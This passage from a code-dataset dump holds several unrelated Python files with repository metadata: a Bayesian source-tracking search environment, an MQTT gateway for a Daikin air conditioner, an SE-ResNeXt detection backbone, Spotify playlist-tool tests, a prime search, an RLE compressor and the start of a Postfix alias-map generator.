Ngrid is None:\n self.N = self._autoset_Ngrid()\n else:\n self.N = int((Ngrid // 2) * 2 + 1) # make it odd\n if self.N < 3:\n raise Exception(\"Ngrid must be at least 3\")\n\n self.draw_source = draw_source\n if not isinstance(self.draw_source, bool):\n raise Exception(\"draw_source must be a bool\")\n\n self.Nactions = 2 * self.Ndim\n\n self.NN_input_shape = tuple([2 * self.N - 1] * self.Ndim)\n\n if not dummy:\n self.restart(initial_hit)\n\n def restart(self, initial_hit=None):\n \"\"\"Restart the search.\n\n Args:\n initial_hit (int or None): initial hit, if None then random\n \"\"\"\n if initial_hit is None:\n self.initial_hit = self._initial_hit()\n else:\n self.initial_hit = int(initial_hit)\n if self.initial_hit > self.Nhits - 1:\n raise Exception(\"initial_hit cannot be > Nhits - 1\")\n\n self.hit_map = -np.ones([self.N] * self.Ndim, dtype=int)\n self.agent = [self.N // 2] * self.Ndim\n self._init_distributed_source()\n if self.draw_source:\n self._draw_a_source()\n\n self.cumulative_hits = 0\n self.agent_near_boundaries = 0\n self.agent_stuck = False\n self.obs = {\"hit\": self.initial_hit, \"done\": False}\n\n self._agento = [0] * self.Ndim # position 1 step ago (arbitrary init value)\n self._agentoo = [self.N] * self.Ndim # position 2 steps ago (arbitrary init value)\n self._repeated_visits = 0 # to detect back and forth motion\n\n def step(self, action, hit=None, quiet=False):\n \"\"\"\n Make a step in the source-tracking environment:\n\n 1. The agent moves to its new position according to `action`,\n 2. The agent receives a hit or the source is found,\n 3. The belief (self.p_source) and the hit map (self.hit_map) are updated.\n\n Args:\n action (int): action of the agent\n hit (int, optional): prescribed number of hits,\n if None (default) the number of hits is chosen randomly according to its probability\n quiet (bool, optional): whether to print when agent is attempting a forbidden move (default=False)\n\n Returns:\n hit (int): number of hits received\n p_end (float): probability of having found the source (relevant only if not draw_source)\n done (bool): whether the source has been found (relevant only if draw_source)\n\n \"\"\"\n hit, p_end, done = self._execute_action(action, hit, quiet)\n self._update_after_hit(hit, done)\n\n return hit, p_end, done\n\n # __ POMDP UPDATES _______________________________________\n def _execute_action(self, action, hit=None, quiet=False):\n self._agentoo = self._agento\n self._agento = self.agent\n\n # move agent\n self.agent, is_move_possible = self._move(action, self.agent)\n if (not is_move_possible) and (not quiet):\n print(\"This move is not possible: agent =\", self.agent, \"cannot do action =\", action)\n self.agent_near_boundaries = self._is_agent_near_boundaries(n_boundary=1)\n self.agent_stuck = self._is_agent_stuck()\n\n if self.draw_source:\n if self.norm_Poisson == 'Manhattan':\n ord = 1\n elif self.norm_Poisson == 'Euclidean':\n ord = 2\n elif self.norm_Poisson == 'Chebyshev':\n ord = float(\"inf\")\n else:\n raise Exception(\"This norm is not implemented\")\n d = np.linalg.norm(np.asarray(self.agent) - np.asarray(self.source), ord=ord)\n\n if d > EPSILON:\n done = False\n p_end = 0\n\n # Picking randomly the number of hits\n mu = self._mean_number_of_hits(d)\n probability = np.zeros(self.Nhits)\n sum_proba = 0\n for h in range(self.Nhits - 1):\n probability[h] = self._Poisson(mu, h)\n sum_proba += self._Poisson(mu, h)\n probability[self.Nhits - 1] = np.maximum(0, 1.0 - sum_proba)\n if hit is None:\n hit = np.random.RandomState().choice(\n range(self.Nhits), p=probability\n )\n else:\n done = True\n p_end = 1\n hit = -2\n\n else:\n done = False\n\n p_end = self.p_source[tuple(self.agent)]\n if p_end > 1 - EPSILON:\n done = True\n\n # Source not in self.agent\n new_p_source = deepcopy(self.p_source)\n new_p_source[tuple(self.agent)] = 0.0\n if np.sum(new_p_source) > EPSILON:\n new_p_source /= np.sum(new_p_source)\n else:\n done = True\n\n if not done:\n # extracting the evidence matrix for Bayesian inference\n p_evidence = self._extract_N_from_2N(input=self.p_Poisson, origin=self.agent)\n\n # Compute hit proba\n p_hit_table = np.zeros(self.Nhits)\n for h in range(self.Nhits):\n p_hit_table[h] = np.maximum(\n 0,\n np.sum(new_p_source * p_evidence[h])\n )\n sum_p_hit = np.sum(p_hit_table)\n if np.abs(sum_p_hit - 1.0) < EPSILON:\n p_hit_table /= sum_p_hit\n else:\n print(\"sum_p_hit_table = \", sum_p_hit)\n raise Exception(\"p_hit_table does not sum to 1\")\n\n # Picking randomly the number of hits\n if hit is None:\n hit = np.random.RandomState().choice(range(self.Nhits), p=p_hit_table)\n\n else:\n hit = -2\n\n if not done:\n self.cumulative_hits += hit\n\n return hit, p_end, done\n \n def _update_after_hit(self, hit, done=None):\n \"\"\"Update of the hit_map and p_source when receiving hits.\n\n Args:\n hit (int): number of hits received\n done (bool): whether the unique source is found\n \"\"\"\n if hit is not None:\n self._update_hit_map(hit)\n self._update_obs(hit, done)\n self._update_p_source(hit, done)\n \n def _update_hit_map(self, hit=0):\n self.hit_map[tuple(self.agent)] = hit\n\n def _update_obs(self, hit, done):\n self.obs[\"hit\"] = hit\n self.obs[\"done\"] = done\n\n def _update_p_source(self, hit=0, done=None):\n if done:\n self.p_source = np.zeros([self.N] * self.Ndim)\n self.p_source[tuple(self.agent)] = 1.0\n self.entropy = 0.0\n else:\n self.p_source[tuple(self.agent)] = 0\n p_evidence = self._extract_N_from_2N(input=self.p_Poisson, origin=self.agent)\n self.p_source *= p_evidence[hit]\n self.p_source[(self.p_source < 0.0) & (self.p_source > -1e-15)] = 0.0\n\n if np.sum(self.p_source) > EPSILON:\n self.p_source /= np.sum(self.p_source)\n self.entropy = self._entropy(self.p_source)\n\n def _move(self, action, agent):\n \"\"\"Move the agent according to action.\n\n Args:\n action (int): action chosen\n agent (list of int): position of the agent\n\n Returns:\n new_agent (list of int): new position of the agent\n is_move_possible (bool): whether the action was allowed\n\n \"\"\"\n is_move_possible = True\n new_agent = deepcopy(agent)\n axis = action // 2\n if axis < self.Ndim:\n direction = 2 * (action % 2) - 1\n if direction == -1:\n if agent[axis] > 0:\n new_agent[axis] -= 1\n else:\n is_move_possible = False\n elif direction == 1:\n if agent[axis] < self.N - 1:\n new_agent[axis] += 1\n else:\n is_move_possible = False\n else:\n raise Exception(\"This action is outside the allowed range\")\n\n return new_agent, is_move_possible\n \n # __ HIT DETECTION _______________________________________\n def _mean_number_of_hits(self, distance):\n distance = np.array(distance)\n distance[distance == 0] = 1.0\n if self.Ndim == 1:\n mu = np.exp(-distance / self.lambda_over_dx + 1)\n elif self.Ndim == 2:\n mu = kn(0, distance / self.lambda_over_dx) / kn(0, 1)\n elif self.Ndim == 3:\n mu = self.lambda_over_dx / distance * np.exp(-distance / self.lambda_over_dx + 1)\n elif self.Ndim > 3:\n mu = (self.lambda_over_dx / distance) ** (self.Ndim / 2 - 1) \\\n * kv(self.Ndim / 2 - 1, distance / self.lambda_over_dx) \\\n / kv(self.Ndim / 2 - 1, 1)\n else:\n raise Exception(\"Problem with the number of dimensions\")\n mu *= self.mu0_Poisson\n return mu\n\n def _Poisson_unbounded(self, mu, h):\n p = Poisson_distribution(mu).pmf(h)\n return p\n\n def _Poisson(self, mu, h):\n if h < self.Nhits - 1: # = Poisson(mu,hit=h)\n p = self._Poisson_unbounded(mu, h)\n elif h == self.Nhits - 1: # = Poisson(mu,hit>=h)\n sum = 0.0\n for k in range(h):\n sum += self._Poisson_unbounded(mu, k)\n p = 1 - sum\n else:\n raise Exception(\"h cannot be > Nhits - 1\")\n return p\n \n def _compute_p_Poisson(self):\n size = 1 + 2 * self.N # note: this could be reduced to size 2N - 1\n origin = [self.N] * self.Ndim\n d = self._distance(N=size, origin=origin, norm=self.norm_Poisson)\n mu = self._mean_number_of_hits(d)\n mu[tuple(origin)] = 0.0\n\n self.p_Poisson = np.zeros([self.Nhits] + [size] * self.Ndim)\n sum_proba = np.zeros([size] * self.Ndim)\n for h in range(self.Nhits):\n self.p_Poisson[h] = self._Poisson(mu, h)\n sum_proba += self.p_Poisson[h]\n if h < self.Nhits - 1:\n sum_is_one = np.all(abs(sum_proba - 1) < EPSILON)\n if sum_is_one:\n raise Exception(str('Nhits is too large, reduce it to Nhits = ' + str(h + 1)\n + ' or lower (higher values have zero probabilities)'))\n\n if not np.all(sum_proba == 1.0):\n raise Exception(\"_compute_p_Poisson: sum proba is not 1\")\n\n # by definition: p_Poisson(origin) = 0\n for h in range(self.Nhits):\n self.p_Poisson[tuple([h] + origin)] = 0.0\n \n # __ INITIALIZATION AND AUTOSET _______________________________________\n def _init_distributed_source(self, ):\n if not hasattr(self, 'p_Poisson'):\n self._compute_p_Poisson()\n self.p_source = np.ones([self.N] * self.Ndim) / (self.N ** self.Ndim - 1)\n self.p_source[tuple([self.N // 2] * self.Ndim)] = 0.0\n self._update_p_source(hit=self.initial_hit)\n self._update_hit_map(hit=self.initial_hit)\n\n def _draw_a_source(self):\n prob = self.p_source.flatten()\n index = np.random.RandomState().choice(self.N**self.Ndim, size=1, p=prob)[0]\n self.source = np.unravel_index(index, shape=([self.N] * self.Ndim))\n self.source = np.array(self.source, dtype=int)\n\n def _initial_hit(self, hit=None):\n if hit is None:\n p_hit_table = np.zeros(self.Nhits)\n r = np.arange(1, int(1000 * self.lambda_over_dx))\n shell_volume = self._volume_ball(r+0.5) - self._volume_ball(r-0.5)\n for h in range(1, self.Nhits):\n p = self._Poisson(self._mean_number_of_hits(r), h) # proba hit=h as a function of distance r to the source\n p_hit_table[h] = max(0, np.sum(p * shell_volume)) # not normalized\n p_hit_table /= np.sum(p_hit_table)\n hit = np.random.RandomState().choice(range(self.Nhits), p=p_hit_table)\n return hit\n \n def _autoset_Ngrid(self, p_source_out=1e-3):\n # return the smallest Ngrid such that, for a virtually infinite domain, the probability of the source\n # being outside a ball of diameter Ngrid is less than p_source_out after any initial hit\n r = np.arange(1, int(1000 * self.lambda_over_dx))\n shell_volume = self._volume_ball(r + 0.5) - self._volume_ball(r - 0.5)\n Ngrid = 0\n hit_list = range(1, self.Nhits)\n for hit in hit_list:\n p = self._Poisson(self._mean_number_of_hits(r), hit) # proba hit=h as a function of distance r to the source\n pball = np.cumsum(p * shell_volume)\n pball /= pball[-1] # proba source is in the ball as a function of ball radius r\n where = np.argwhere(1 - pball < p_source_out)[0, 0]\n Ngrid = max(Ngrid, 2 * (where + 1) + 1)\n return int(Ngrid)\n\n def _autoset_Nhits(self):\n mu_at_dx = self._mean_number_of_hits(1.0)\n h = mu_at_dx + np.sqrt(mu_at_dx)\n return int(np.ceil(h)) + 1\n \n # __ LOW LEVEL UTILITIES _______________________________________\n def _entropy(self, array, axes=None):\n log2 = np.zeros(array.shape)\n indices = array > EPSILON\n log2[indices] = -np.log2(array[indices])\n return np.sum(array * log2, axis=axes)\n\n def _distance(self, Ndim=None, N=None, origin=None, norm='Euclidean'):\n if Ndim is None:\n Ndim = self.Ndim\n if N is None:\n N = self.N\n if origin is None:\n origin = self.agent\n if len(origin) != Ndim:\n print(origin)\n raise Exception(\"The origin coordinates are not consistent with the number of dimensions\")\n\n coord = np.mgrid[tuple([range(N)] * Ndim)]\n for i in range(Ndim):\n coord[i] -= origin[i]\n d = np.zeros([N] * Ndim)\n if norm == 'Manhattan':\n for i in range(Ndim):\n d += np.abs(coord[i])\n return d\n elif norm == 'Euclidean':\n for i in range(Ndim):\n d += (coord[i]) ** 2\n d = np.sqrt(d)\n return d\n elif norm == 'Chebyshev':\n d = np.amax(np.abs(coord), axis=0)\n return d\n else:\n raise Exception(\"This norm is not implemented\")\n\n def _volume_ball(self, r, Ndim=None, norm=None):\n if Ndim is None:\n Ndim = self.Ndim\n if norm is None:\n norm = self.norm_Poisson\n if norm == 'Manhattan':\n pm1 = 1\n elif norm == 'Euclidean':\n pm1 = 1 / 2\n elif norm == 'Chebyshev':\n pm1 = 0\n else:\n raise Exception(\"This norm is not implemented\")\n return (2 * Gamma(pm1 + 1) * r) ** Ndim / Gamma(Ndim * pm1 + 1)\n\n def _is_agent_near_boundaries(self, n_boundary):\n # is the agent within n_boundary cell(s) of a boundary of the computational domain?\n for axis in range(self.Ndim):\n if (self.agent[axis] >= self.N - 1 - n_boundary) or (\n self.agent[axis] <= n_boundary\n ):\n return 1\n return 0\n\n def _is_agent_stuck(self):\n agent_stuck = False\n if self._agentoo == self.agent:\n self._repeated_visits += 1\n else:\n self._repeated_visits = 0\n if self._repeated_visits > 8:\n agent_stuck = True\n return agent_stuck\n\n def _set_mu0_Poisson(self, ):\n \"\"\"Sets the value of mu0_Poisson (mean number of hits at distance = lambda), which is derived from the\n physical dimensionless parameters of the problem. It is required by _mean_number_of_hits().\n \"\"\"\n dx_over_a = 2.0 # agent step size / agent radius\n lambda_over_a = self.lambda_over_dx * dx_over_a\n a_over_lambda = 1.0 / lambda_over_a\n\n if self.Ndim == 1:\n mu0_Poisson = 1 / (1 - a_over_lambda) * np.exp(-1)\n elif self.Ndim == 2:\n mu0_Poisson = 1 / np.log(lambda_over_a) * kn(0, 1)\n elif self.Ndim == 3:\n mu0_Poisson = a_over_lambda * np.exp(-1)\n elif self.Ndim > 3:\n mu0_Poisson = (self.Ndim - 2) / Gamma(self.Ndim / 2) / (2 ** (self.Ndim / 2 - 1)) * \\\n a_over_lambda ** (self.Ndim - 2) * kv(self.Ndim / 2 - 1, 1)\n else:\n raise Exception(\"problem with Ndim\")\n\n mu0_Poisson *= self.R_dt\n self.mu0_Poisson = mu0_Poisson\n\n def _extract_N_from_2N(self, input, origin):\n if len(origin) != self.Ndim:\n raise Exception(\"_extract_N_from_2N: len(origin) is different from Ndim\")\n if input.shape[-1] == 2 * self.N + 1:\n index = np.array([self.N] * self.Ndim) - origin\n elif input.shape[-1] == 2 * self.N - 1:\n index = np.array([self.N - 1] * self.Ndim) - origin\n else:\n raise Exception(\"_extract_N_from_2N(): dimension of input must be 2N-1 or 2N+1\")\n if self.Ndim == 1:\n output = input[..., index[0]:index[0] + self.N]\n elif self.Ndim == 2:\n output = input[...,\n index[0]:index[0] + self.N,\n index[1]:index[1] + self.N]\n elif self.Ndim == 3:\n output = input[...,\n index[0]:index[0] + self.N,\n index[1]:index[1] + self.N,\n index[2]:index[2] + self.N]\n elif self.Ndim == 4:\n output = input[...,\n index[0]:index[0] + self.N,\n index[1]:index[1] + self.N,\n index[2]:index[2] + self.N,\n index[3]:index[3] + self.N]\n else:\n raise Exception(\"_extract_N_from_2N() not implemented for Ndim > 4\")\n return output\n\n # __ INPUT TO VALUE FUNCTION _______________________________________\n def _centeragent(self, p, agent):\n \"\"\"Return the probability density of the source centered on the agent\n\n Args:\n p (numpy array): initial probability in a non-centered environment\n agent (list): vector position of the agent\n\n Returns:\n numpy array: probability density centered on the agent (tensor of size (2 * N - 1) ** Ndim)\n \"\"\"\n result = np.zeros([2 * self.N - 1] * self.Ndim)\n if self.Ndim == 1:\n result[self.N - 1 - agent[0]:2 * self.N - 1 - agent[0]] = p\n elif self.Ndim == 2:\n result[\n self.N - 1 - agent[0]:2 * self.N - 1 - agent[0],\n self.N - 1 - agent[1]:2 * self.N - 1 - agent[1],\n ] = p\n elif self.Ndim == 3:\n result[\n self.N - 1 - agent[0]:2 * self.N - 1 - agent[0],\n self.N - 1 - agent[1]:2 * self.N - 1 - agent[1],\n self.N - 1 - agent[2]:2 * self.N - 1 - agent[2],\n ] = p\n else:\n raise Exception(\"_centeragent is not implemented for Ndim > 3\")\n\n return result\n","repo_name":"C0PEP0D/otto","sub_path":"otto/classes/sourcetracking.py","file_name":"sourcetracking.py","file_ext":"py","file_size_in_byte":23646,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"31747144097","text":"import config\nfrom Logger import Logger\nfrom Mqtt import Mqtt\nfrom daikinapi import Daikin\nimport time\nimport sys\nimport traceback\n\nmqtt = Mqtt()\ndaikin = Daikin()\n\ndef app():\n mqtt.connect()\n mqtt.loop_start()\n\n #mqtt.update_status(config.MQTT_GATEWAY_STATUS_START)\n #mqtt.publish(config.MQTT_GATEWAY_ERROR_CMD, \"\")\n\n while True:\n time.sleep(0.1)\n\n #mqtt.update_status(config.MQTT_GATEWAY_STATUS_QUIT)\n mqtt.loop_stop()\n\n\nif __name__ == \"__main__\":\n try:\n app()\n except KeyboardInterrupt:\n Logger().info('Main : Interrupted')\n exit()\n except Exception as e:\n Logger().info(f\"Main : Oops! {str(sys.exc_info())} occured. \\n {traceback.format_exc()}\\n\")\n mqtt.publish_event(config.MQTT_GATEWAY_ERROR_CMD, traceback.format_exc())\n","repo_name":"juliend20/DaikinWifi2Mqtt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23399318275","text":"#!/usr/bin/env python\n# TR\nimport os\nmodules = 'stations events data trace stream rf imaging' #xcorr\nos.chdir('../')\nfor module in modules.split():\n command = 'python %s.py' % module\n print(command + ' ...\\n')\n os.system(command)\n\n","repo_name":"trichter/sito","sub_path":"tests2/other_test_main_in_modules.py","file_name":"other_test_main_in_modules.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"7883183170","text":"import torch.nn as nn\nimport pretrainedmodels \n\nfrom torch.nn.modules.batchnorm import _BatchNorm\n\nfrom ..registry import BACKBONES\n\n@BACKBONES.register_module\nclass SEResNeXt(nn.Module):\n \"\"\"SE-ResNeXt backbone.\n\n Args:\n depth (int): Depth of resnet, from {18, 34, 50, 101, 152}.\n in_channels (int): Number of input image channels. Normally 3.\n num_stages (int): Resnet stages, normally 4.\n strides (Sequence[int]): Strides of the first block of each stage.\n dilations (Sequence[int]): Dilation of each stage.\n out_indices (Sequence[int]): Output from which stages.\n style (str): `pytorch` or `caffe`. If set to \"pytorch\", the stride-two\n layer is the 3x3 conv layer, otherwise the stride-two layer is\n the first 1x1 conv layer.\n frozen_stages (int): Stages to be frozen (stop grad and set eval mode).\n -1 means not freezing any parameters.\n norm_cfg (dict): dictionary to construct and config norm layer.\n norm_eval (bool): Whether to set norm layers to eval mode, namely,\n freeze running stats (mean and var). Note: Effect on Batch Norm\n and its variants only.\n with_cp (bool): Use checkpoint or not. Using checkpoint will save some\n memory while slowing down the training speed.\n zero_init_residual (bool): whether to use zero init for last norm layer\n in resblocks to let them behave as identity.\n\n Example:\n >>> from mmdet.models import ResNet\n >>> import torch\n >>> self = ResNet(depth=18)\n >>> self.eval()\n >>> inputs = torch.rand(1, 3, 32, 32)\n >>> level_outputs = self.forward(inputs)\n >>> for level_out in level_outputs:\n ... print(tuple(level_out.shape))\n (1, 64, 8, 8)\n (1, 128, 4, 4)\n (1, 256, 2, 2)\n (1, 512, 1, 1)\n \"\"\"\n\n def __init__(self,\n depth,\n out_indices=(0, 1, 2, 3),\n frozen_stages=-1,\n norm_eval=True):\n super().__init__()\n\n self.depth = depth\n self.out_indices = out_indices\n self.frozen_stages = frozen_stages\n self.norm_eval = norm_eval\n\n\n model = getattr(pretrainedmodels, 'se_resnext{}_32x4d'.format(depth))(pretrained=None)\n self.layer0 = model.layer0\n self.layer1 = model.layer1\n self.layer2 = model.layer2\n self.layer3 = model.layer3\n self.layer4 = model.layer4\n\n self.res_layers = ['layer{}'.format(i) for i in range(1, 5)]\n\n self._freeze_stages()\n\n\n def _freeze_stages(self):\n for i in range(0, self.frozen_stages + 1):\n m = getattr(self, 'layer{}'.format(i))\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n def init_weights(self, pretrained):\n if pretrained is None:\n return\n print ('Loading <{}> pretrained weights ...'.format(pretrained))\n model = getattr(pretrainedmodels, 'se_resnext{}_32x4d'.format(self.depth))(pretrained=pretrained)\n for layer_name in ['layer0'] + self.res_layers:\n layer_dict = getattr(model, layer_name).state_dict()\n getattr(self, layer_name).load_state_dict(layer_dict) \n\n def forward(self, x):\n x = self.layer0(x)\n outs = []\n for i, layer_name in enumerate(self.res_layers):\n res_layer = getattr(self, layer_name)\n x = res_layer(x)\n if i in self.out_indices:\n outs.append(x)\n return tuple(outs)\n\n def train(self, mode=True):\n super().train(mode)\n self._freeze_stages()\n if mode and self.norm_eval:\n for m in self.modules():\n # trick: eval have effect on BatchNorm only\n if isinstance(m, _BatchNorm):\n m.eval()\n","repo_name":"yihhan/3dcnn_code","sub_path":"deepfake/deepfake/mmdetection/mmdet/models/backbones/se_resnext.py","file_name":"se_resnext.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7021030098","text":"# external\n# python native\nimport time\nimport logging\nimport json\nimport sys\nimport winsound\nimport traceback\n# project\nfrom Gustelfy import database\nfrom Gustelfy.objects import album, artist, playlist, track, user\nfrom Gustelfy.util import config\nfrom Gustelfy import session, spotify_api\n\ndef test():\n try:\n if len(sys.argv) >= 2:\n if sys.argv[2] == \"api\":\n api()\n if sys.argv[2] == \"merge\":\n merge()\n if sys.argv[2] == \"db\":\n db_connection()\n if sys.argv[2] == \"dbp\":\n dbp()\n if sys.argv[2] == \"obj\":\n objects()\n if sys.argv[2] == \"update\":\n db_update()\n else:\n print(\"Select test to run.\")\n except Exception as e:\n print(e)\n traceback.print_exc()\n amogus()\n exit()\n winsound.Beep(523, 300) # C5\n winsound.Beep(523, 150) # C5\n winsound.Beep(659, 600) # E5\n\ndef db_update():\n \"\"\"Testing update of incomplete entries\n \"\"\"\n logger = logging.getLogger(\"Gustelfy\")\n logger.setLevel(10)\n logger.debug(\"amogus\")\n session = prepare()\n\n #session.db_con.add_album(session.spotify.fetch_album(\"66Oi1725EJCwCh3NqWcRuL\"))\n\n session.update_database()\n \ndef dbp():\n \"\"\"Testrun without flask\"\"\"\n logger = logging.getLogger(\"Gustelfy\")\n logger.setLevel(10)\n # Initialise config object\n settings = config.Config()\n # Connect to database and fix table\n db = database.Database(\"oracledb\").get_db_connection()\n usr = user.User(\"testmanfred\")\n # Connect to spotify\n spotify = spotify_api.Spotify_api()\n user_session = session.Session(usr, spotify, db)\n\n # Test database fillup\n user_session.dbp_fill_db()\n\n # test of fetch_favorites album bug\n \"\"\"\n testdata = user_session.spotify.fetch_favorites()\n json_data = user_session.spotify.fetch_favorites(json=True)\n\n i = 0\n for fav in testdata:\n print(fav.get_album())\n i += 1 \n if i > 10:\n break\n\n if isinstance(json_data, dict):\n with open('test.json', 'w') as amogus:\n json.dump(json_data,amogus,indent=3)\n print(\"result written to test.json\")\n return\n \"\"\"\ndef objects():\n \"\"\"testing different objects\"\"\"\n user_session = prepare()\n\n #\n test_artist = artist.Artist(\n id = \"11111_test\",\n name = \"11111_test\",\n genres = [\"test_genre1\",\"test_genre2\"],\n images = [{\"height\":64,\"url\":\"https://www.scdn.co/i/_global/favicon.png\",\"width\":64}],\n popularity = 69,\n followers = 420\n )\n\n test_track = track.Track(\n id = \"11111_test\",\n name = \"TEST_TRACK\",\n artists = [test_artist],\n duration_ms = 123456,\n album_id = \"11111_test\",\n disc_number = 1,\n track_number = 1,\n explicit = True,\n popularity = 34\n )\n \n test_album = album.Album(\n id = \"11111_test\",\n name = \"TEST_ALBUM\",\n artists = [test_artist],\n tracks = [test_track],\n images = [{\"height\":64,\"url\":\"https://www.scdn.co/i/_global/favicon.png\",\"width\":64}],\n release_date = \"2021-01-01\",\n total_tracks = 1,\n popularity = 69\n )\n #print(test_album)\n #user_session.db_con.add_album(test_album)\n #user_session.db_con.add_artist(test_artist)\n user_session.db_con.add_track(test_track)\n return\n\ndef api():\n logger = logging.getLogger(\"Gustelfy\")\n logger.setLevel(10)\n settings = config.Config()\n spotify = spotify_api.Spotify_api()\n result = {}\n \n # Turbo thomas: 2vWnOXI1ALzlvNTdjVPMG1\n # Rap über hass: 21ownMQ51Jqlv8si9CTI6R\n #result = spotify.fetch_track('21ownMQ51Jqlv8si9CTI6R',json=True)\n #result = spotify.fetch_album(\"1kTlYbs28MXw7hwO0NLYif\",json=True)\n result = spotify.fetch_artist(\"1ehBmvzykgp3Il0BUIZdev\",json=True)\n result_o = spotify.fetch_artist(\"1ehBmvzykgp3Il0BUIZdev\")\n #result = spotify.fetch_playlist(\"349T3IRkkkTyBc1SqyP1JH\",json=True)\n #result = spotify.fetch_playlist(\"5JfpaSo0hvoRdGRYFrEP3x\",json=True) # wtf?\n #result = spotify.amogus(\"5JfpaSo0hvoRdGRYFrEP3x\")\n #result = spotify.fetch_favorites(json=True)\n #result = spotify.fetch_playlists(json=True)\n #result = spotify.fetch_user(json=True)\n #result = spotify.fetch_playlist_tracks(\"349T3IRkkkTyBc1SqyP1JH\",json=True)\n print(result_o.get_followers())\n with open('test.json', 'w') as amogus:\n json.dump(result,amogus,indent=3)\n print(\"result written to test.json\")\n #result = spotify.fetch_playlist(\"349T3IRkkkTyBc1SqyP1JH\")\n #print(result.get_tracks())\n\ndef merge():\n \"\"\"Testing the merge function for different spotify objects\n \"\"\"\n old = track.Track(\n id=\"amogus123\",\n artists=[],\n name=\"Amogus Party\",\n timestamp=1,\n duration_ms=12343,\n explicit=False,\n popularity=20,\n track_number=12\n )\n new = track.Track(\n id=\"amogus123\",\n artists=[artist.Artist(id=\"mogusmann\",name=\"kekw\")],\n name=\"Amogus Party\",\n timestamp=3,\n duration_ms=123,\n explicit=True,\n popularity=20\n )\n new.merge(old)\n mogus = new\n print(\n f\"{mogus.get_id()} {mogus.get_artists()} {mogus.get_name()} {mogus.get_timestamp()} {mogus.get_duration_ms()} {mogus.is_expired()} {mogus.get_popularity()} {mogus.get_track_number()}\"\n )\n\ndef amogus():\n \"\"\"sus\n \"\"\"\n winsound.Beep(523, 300) # C5\n winsound.Beep(622, 300) # E5 flat\n winsound.Beep(698, 300) # F5\n winsound.Beep(740, 300) # G5 flat\n winsound.Beep(698, 300) # F5\n winsound.Beep(622, 300) # E5 flat\n winsound.Beep(523, 300) # C5\n time.sleep(0.6)\n winsound.Beep(466, 150) # B4 flat\n winsound.Beep(587, 150) # D5\n winsound.Beep(523, 300) # C5\n\ndef prepare() -> session.Session:\n logger = logging.getLogger(\"Gustelfy\")\n logger.setLevel(10)\n # Initialise config object\n config.Config()\n # Connect to database and fix table\n db = database.Database(\"oracledb\").get_db_connection()\n usr = user.User(\"testmanfred\")\n # Connect to spotify\n spotify = spotify_api.Spotify_api()\n return session.Session(usr, spotify, db)\n\n\ndef db_connection():\n \"pyhton -m Gustelfy db\"\n db = database.Database(\"oracledb\").get_db_connection()\n db.connect_database()\n \n test_artist = artist.Artist(\n id=\"42069\",\n name=\"Arschbach Poposohn\",\n genres=[\"wurst and roll\",\"rap\"]\n )\n test_artist.set_image_url(\"https://google.com/image/amogus.png\")\n \n #result = db.get_artist(\"42069\")\n #print(result.get_genres())\n print(db.add_artist(test_artist))\n\n #db.add_artist(test_artist)","repo_name":"krippix/GustelfyPlaylists","sub_path":"Gustelfy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4195158041","text":"import itertools\n\nprimes = [2]\ncount = 1\nn = 3\nwhile count < 10001:\n m = n ** 0.5 + 1\n if all(n % x != 0 for x in itertools.takewhile(lambda i: i < m, primes)):\n primes.append(n)\n count += 1\n n += 2\nprint(primes[-1])","repo_name":"ducngtuan/euler","sub_path":"1-50/problem7/problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39001000859","text":"#Реализуйте RLE алгоритм: реализуйте модуль сжатия и восстановления данных.\n#Входные и выходные данные хранятся в отдельных текстовых файлах.\n\n# чтение из файла \nwith open('file1.txt', 'r') as data:\n st = data.readline()\n\nprint(' Строка из файла fil1.txt')\nprint(st)\n\n\n# сжатие данных \nls = []\nn = len(st)\nj = 1\ni = 0\nwhile i < (n-1):\n if st[i] == st[i+1]:\n j = j + 1\n h = str(j)\n i = i + 1\n else:\n h = str (j)\n a = h + st[i] \n i = i + 1\n j = 1\n ls.append(a)\nb = str(j)\na1 = b + st[-1] \nls.append(a1)\nstro = ''.join(ls)\nprint(stro)\n\nwith open('file2.txt', 'w') as f: f.write(stro) # запись сжатых данных в файл\n\n# распаковка данных\nnum = 0\nnov_str =[] \nfor i in range(len(stro)):\n if stro[i].isdigit():\n elem = int(stro[i])\n else:\n nov_str.append(stro[i] * elem) \nnov_str1 = ''.join(nov_str)\nprint(nov_str1) \n\n","repo_name":"Olga-Chichikina/PytonZad","sub_path":"DZ5/zad5_4.py","file_name":"zad5_4.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40115693819","text":"import logging\n\nimport protobufs.messages.daan_pb2 as daan_pb2\nfrom tarjan.tc import tc\n\nfrom django.conf import settings\nfrom django.utils import six\n\nimport kn.leden.entities as Es\nfrom kn.leden.date import now\n\n# TODO (issue #7) handle cycles properly.\n\n\ndef generate_postfix_map():\n tbl = daan_pb2.PostfixMap() # the virtual map\n non_mailman_groups = {}\n dt_now = now()\n id2email = {}\n # handle the straightforward cases\n for e in Es.all():\n if e.canonical_email is None:\n continue\n id2email[e._id] = e.canonical_email\n for nm in e.other_names:\n tbl.map[\"%s@%s\" % (nm, settings.MAILDOMAIN)].values.append(e.canonical_email)\n if e.type == 'user':\n tbl.map[e.canonical_email].values.append(e.email)\n elif e.type == 'group':\n if e.got_mailman_list and e.name:\n tbl.map[e.canonical_email].values.append('%s@%s' % (\n str(e.name), settings.LISTS_MAILDOMAIN))\n else:\n non_mailman_groups[e._id] = e\n else:\n logging.warn(\"postfix: unhandled type: %s\" % e.type)\n id_email = \"%s@%s\" % (e.id, settings.MAILDOMAIN)\n if id_email not in tbl.map:\n tbl.map[id_email].values.append(e.canonical_email)\n # handle the non-mailman groups\n for rel in 